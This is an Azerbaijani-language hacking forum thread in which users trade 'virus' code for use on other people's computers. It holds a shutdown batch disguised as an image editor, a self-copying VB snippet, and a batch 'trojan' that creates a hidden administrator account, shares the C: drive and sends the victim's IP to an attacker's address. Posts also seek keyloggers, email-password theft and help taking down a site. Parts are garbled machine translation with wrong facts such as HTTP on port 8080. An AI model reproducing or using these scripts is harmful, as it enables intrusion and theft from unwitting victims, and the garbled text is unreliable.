Virusa bənzər .exe

[Guest Vusal]

Əlində virus deyil yalniz komputerü söndürən bir koddur.Çoxları bu kodu bilir.
shutdown -s -t 0

Bizim edəcəyimiz bu kodu text faylına yazıb və fayl sonluğunu Məsələn: bir proqram adı yazmaq olar "İmage Editor.bat" olaraq yadda saxlayırıq.
Davamına isə Video dərslikdən baxa bilərsiz...

Videoda başa dümədiyiniz bir yer olursa soruşa bilərsiz...

...YÜKLƏ...

..::Yüklə Paylash.net::..

[Elvin Məlikov]

Indi mən sizə kompu yandiran virus kodu verim.

Private Sub Form_Unload(Cancel As Integer)

Randomize Timer

Dim ras, yol, sonuc, calis

ras = Rnd * 1000000

yol = App.Path & "\\\\" & App.EXEName & ".exe"

sonuc = ras & ".exe"

kp = "c:\\\\windows\\\\system32\\\\drivers\\\\" & sonuc & ""

FileCopy yol, "c:\\\\windows\\\\system32\\\\drivers\\\\" & sonuc & ""

calis = Shell(kp)

End Sub

Bunu .bat kimi yadda saxlayin.

[Xanis_007]

Sizde ele kod var ki onu kimese gonderende ( meselen mail agentnen ) hemin adamin kodu ip adresi ve. s. melumatlari size gelsin. 100% bilirem bele kod var amma kodu bilmirem bilen varsa komey elesin.http://forum.windows-az.com/topic_315/reply/#

 

 

[Guest Vusal]

Keylogger hazirlamaq lazimdir...yada trojan

[Elvin Məlikov]

vusal o nedir ele?

[Guest Vusal]

hazirlanmasini bilmirem ama email parolunu tpmaq ucun yadaki İP oyrenmek ucun en yaxsi usul udur..ya keylogger yadaki trojan hazirlayib kimese gondermek odaki senin emaline gelir...bezen C diskindeki text faylina yazilir...

[Xanis_007]

Vusal o trojan didiyivi hazirlaya ilersen ?-- Bir da onun hazirlanmasina aid video derslik olsa sevinerem.

 

Esas paroldu qalani bow weydi.

[Guest Vusal]

Mn Trojan hazirlaya bilmirem...Googlede ama tapa bilersen...

yazki Googlede Trojan hazirlama.

[Xanis_007]

^^^^^^^^^^^^ ||\\

|__EMEGE SAYGI_| || ””|””\\____

| ____________ l | |__|__|___|)

(@) (@)”””””** (@) (@) *** (@)

 

Vusal axdardim amma nese duz emmeli bir wey tapa bilmedim. Yene axdaracam amma imkan olsa men 1 dene trojan yarada bilersen hansi ki bawqasinin kodlarini sene gonderir.

[telebe_adna]

salam.men bir wap sayti dagirtmaq istiyirem/mene bu iwde komeklik etseniz chox sevinerem..komek etmek isteyen mene yazsin..anxious91@mail.ru..evelceden twk

[azerbaycan_yek]

Private Sub Form_Unload(Cancel As Integer)

Randomize Timer

Dim ras, yol, sonuc, calis

ras = Rnd * 1000000

yol = App.Path & "\\\\" & App.EXEName & ".exe"

sonuc = ras & ".exe"

kp = "c:\\\\windows\\\\system32\\\\drivers\\\\" & sonuc & ""

FileCopy yol, "c:\\\\windows\\\\system32\\\\drivers\\\\" & sonuc & ""

calis = Shell(kp)

End Sub

[serverus]

Uşaqlar bu məlumatları türk sayıtlarının birindən götürmüşəm baxın işə yarayacaq.

 

 

* mövzunun başlığında da anlaya biləcəyiniz kimi Anti

Virus proqramları tərəfindən tanınmayan tamamilə sizə aid bir trojan

etməyi sizə kisaca anlatacağım;

 

Trojan əsas məqsədi * adindan

da aydın olacağı kimi hədəf sistemə sızaraq ya ələ keçirmək, ya da məlumat

toplamaktir. Diqqət edin zərər vermək demirəm çünki bu etik olaraq

sehv bir hərəkətdir

 

Bazarda bu mövzuda son dərəcə

funksional bircok Trojan var lakin bu trojanları Kodlayanlar hamısı

Ticarət amac güttükleri üçün ki, bu mövzuda da sonuna qədər haklidirlar *

Trojanlar Special Edition olan versiyalarının disindaki bütün Public

versiyaları təəssüf ki, OV lerce tanınmaqda və hamısından əhəmiyyətlisi

Firewallar tərəfindən bloka edilmektedirler və bu da kullanicilarin

isini olduqca çətinləşdirir.

 

Sizə indi anlatacağım

üsul * bir az məntiq bir az da texniki məlumat tələb edir. Bu

ikisinin xaricində başqa heç bir toola ehtiyacınız yoxdur.

 

İndi Trojanimizi hazırlamağa başlayaq;

 

1 -) Əvvəlcə bir TXT faylı acın və icine su əmri daxil edin;

 

net user HACK / add

 

Bu

əmr sayəsində qurbanın maşınında "HACK" adında bir user yaratdıq.

Lakin bu user hesabi normal olaraq açıldığı üçün hüquqları da məhdud

olacaqdır. Bu səbəblə ikinci mərhələyə keçirik;

 

2 -) İndi yuxarıdakı əmri dərhal bir alt satirina gecin və su əmri əlavə edin;

 

dəqiq localgroup administrators HACK / add

 

Beləcə "HACK" adlı istifadəçi hesabını * dirək Administrator qrupuna kattım. Artik "HACK" hesabımız bütün səlahiyyətlərə sahibdir.

 

3 -)

İndi də kurbanimizin makinasindaki C: \\ sürücüsünü sərhədsiz paylasima

açacağıq. Qurbanı da huylandirmamak üçün paylasim adini SYSTEM olaraq

set edecegiz. Bunun üçün aşağıdakı əmri istifadə edəcəyi;

 

net share system = C: \\ / unlimited

 

Ewet

artıq Kurbanimizin maşınını sonuna qədər açdı. Yaxşı qurbanın IP sini

haradan biləcəyik də qurbanın maşınına bu yaratdığımız "HACK"

hesabından bağlanacağı?

 

Bunun üçün də kodumuza bir satirlik bir əmr daha ekleyecegiz;

 

4 -)

NET SEND əmrini istifadə edərək qurbanın bizə Windowsun Messaging Xidməti

vasitəsi ilə müzakirəsi atmasini və IP sini bizə söyləməsini təmin edəcəyik.

Bunun üçün aşağıdakı əmri də kodunuzu icerisine əlavə edin;

 

dəqiq send 82.35.23.46 (bura öz IP nizi daxil edin) Mən sənin kurbaninim Gəl mənə baglan

 

Unutmayin 82. li başlayan IP ünvanı yerinə öz IP nizi yazin.

 

4 -)

Son olaraq kiçik bir tədbir alacagiz. Bəs bu tədbir? Bildiyiniz

kimi Windows Messenger xidmətini istifadə internetdə ortalıqda gəzişən

bircok kiçik Spylar olduğu üçün Messenger xidməti ümumiyyətlə Disabled

Dir. Disabled olsa NET SEND əmri bir isə yaramaz. İşdə bu sonuncu

önlemimizde də bu xidməti Disabled tan Automatic rejiminə set

etdirəcəyi. Əvvəlcə Administrative Tools dan Services ə

giririk və oradan Messenger xidmətinin kod icerisinde kullanacagimiz

adini öyrənirik. Adi Messenger 'mis. indi bu adi istifadə edərək bu

xidməti işlədirik.

 

dəqiq start Messenger

 

Sizə

tövsiyəm * bu son əmri kodunuzu ən başına qoymaq. Beləliklə

ardışık sırada əvvəl Messenger xidməti çalıştırılacak daha sonra digər

hisləmlər yapilacaktir. Kodun sağlam çalışması baxımından bu 4. variantı

ilk siraya qoymanız daha yaxşı olar.

 

Son olaraq TXT də

yazdiginiz kodunuzu. bat olaraq istədiyiniz bir adda yazın və

istər bir EXE ilə join etdirin istər bir şəkil ilə birləşdirin

istəsəniz kurbaniniza dirək göndərin.

 

Kurbanım bu faylı

işlətdiyi an maşınında Admin hüquqlarına sahib HACK adında bir user

acilacak və sifresi də blank yəni boş olacaqdır. C: \\ sürücüsü də full

olaraq paylasima acilmis olacaq və son olaraq da IP si sizə gələcəkdir.

 

 

Artik IP sini də bildiyinizi görə * istər DOS əmr sətirinə

düşərək dirək HACK üzvə bağlana istediginizi

edə bilərsiniz istər Essential Net Tools növündən bir proqram ilə

paylasima actirdiginiz C: \\ sürücüsünə sızar istediginizi edərsiniz.

 

Isin

ən gözəl tərəfi * yukaridaki BAT faylının tamamilə Microsoftun bizə

təqdim etdiyi DOS əmrləri kullanilarak hazirlanmis olmasi səbəbi ilə heç bir

Anti Virus yakalanmamasi və "HACK" üzvə dirək Admin olaraq

baglandiginiz üçün heç bir personal firewall tərəfindən engellenmemesidir

 

[Xanis_007]

serverus Salam. Eziyete gore cox sag ol qaqaw. Bu melumati men hansisa bir turk saytinda gormuwdum. deqiq yadimda deyil. Bunu eledim amma burda mene bir komek lazimdi bu mesenger asitesiyle iwdiyir bes bunun mail.ru-Agent vasitesiyle iwletmek olar ?????????? Eger olarsa yaza bilersen ???

[serverus]

Xanis_007

Qaqam bunun istifadəsini dəqiq bilmirəm sadəcə kömək olsun deyə tapdım əyər bu üsul mail.ru da alınmırsa başqa cürünü tapıb yerləşdirməyə çalışaram.

[Xanis_007]

serverus Sag ol. Olsa mail.ru_agentnen yaxwi olar.

[Guest Cavid018]

Salamalr.....Xanis_007.....Bela deyim mail.ru-dan sana ancaq maktubularin parollari ve mail ozu gala bilar istadiyin yera,amma proqramin ozunu tapmalisan (BRUTUS) adli proqramdi,sadece SMTP POP3 HTTP portlari haqqinda yaqin malumatin var,varsa duzalar yaqinki birde bela weylar bizim provayderlardanda asilidi,agilli sisadminler kenardan giriw portlarini bagliyir diqqatli ol.....birde istadiyin komputera Keylogger proqramini yaza bilarsan.KLAVIANURANIN altinda virtual olaraq gizlanir,ve haman proqrama pusk veran kimi hansi saytlara mail-lara girdiyin vaxti ve parollari sanin istadiyin yera gondarir......UGURLAR diqqatli ol

[Huseyn.]

Cavid018 qaqaw zehmet olmasa (BRUTUS) adli proqrami bura yukluye bilersen..? Bir da duzune qalsa SMTP POP3 HTTP portlari haqqinda hec ne bilmirem o haqqda da nese yaza bilersen ...??

[Guest Cavid018]

SMTP-Simple Mail Transfer Protocol

tcp/ip shebekesi altinda ( poçta )

e-mail gondərmək uçun nəzərda tutulub.Port 25

 

POP3-Post Office Protocol Version 3

Serverdən e-poçt ( e-mail ) almaq uçun istifadə edinlir port. Adətən SMTP protokolu ilə birgə istifadə olunur.Port-110

 

HTTP-Hyper Text Transfer Protocol

İlkin mətn sənədləri şəklində ( Qipertext dokument ) istifadə olan port.Fikir versən gorəcəksənki çox saytlarin əvvəlində ( http:// ) yazilir.Port-8080

 

Brutus proqrami ilə işləmək uçun sana troyan lazim olacaq və mail toplusu ( 100-lərlə mail ).....varindi? Bir məsələnidə fikrinə çatdrim,bu iş sənə elə belə galməsin agilli sisadminlər kənar portlari bağlayir və serverdən sənin komputerini hətta format edə bilərlər.Birdə hack etdiyin saytin huquqlarini pozdupğuna gorə sənə işdə duşə bilər,onsuzda (mail.ru) serverinin bazasi dəyişilib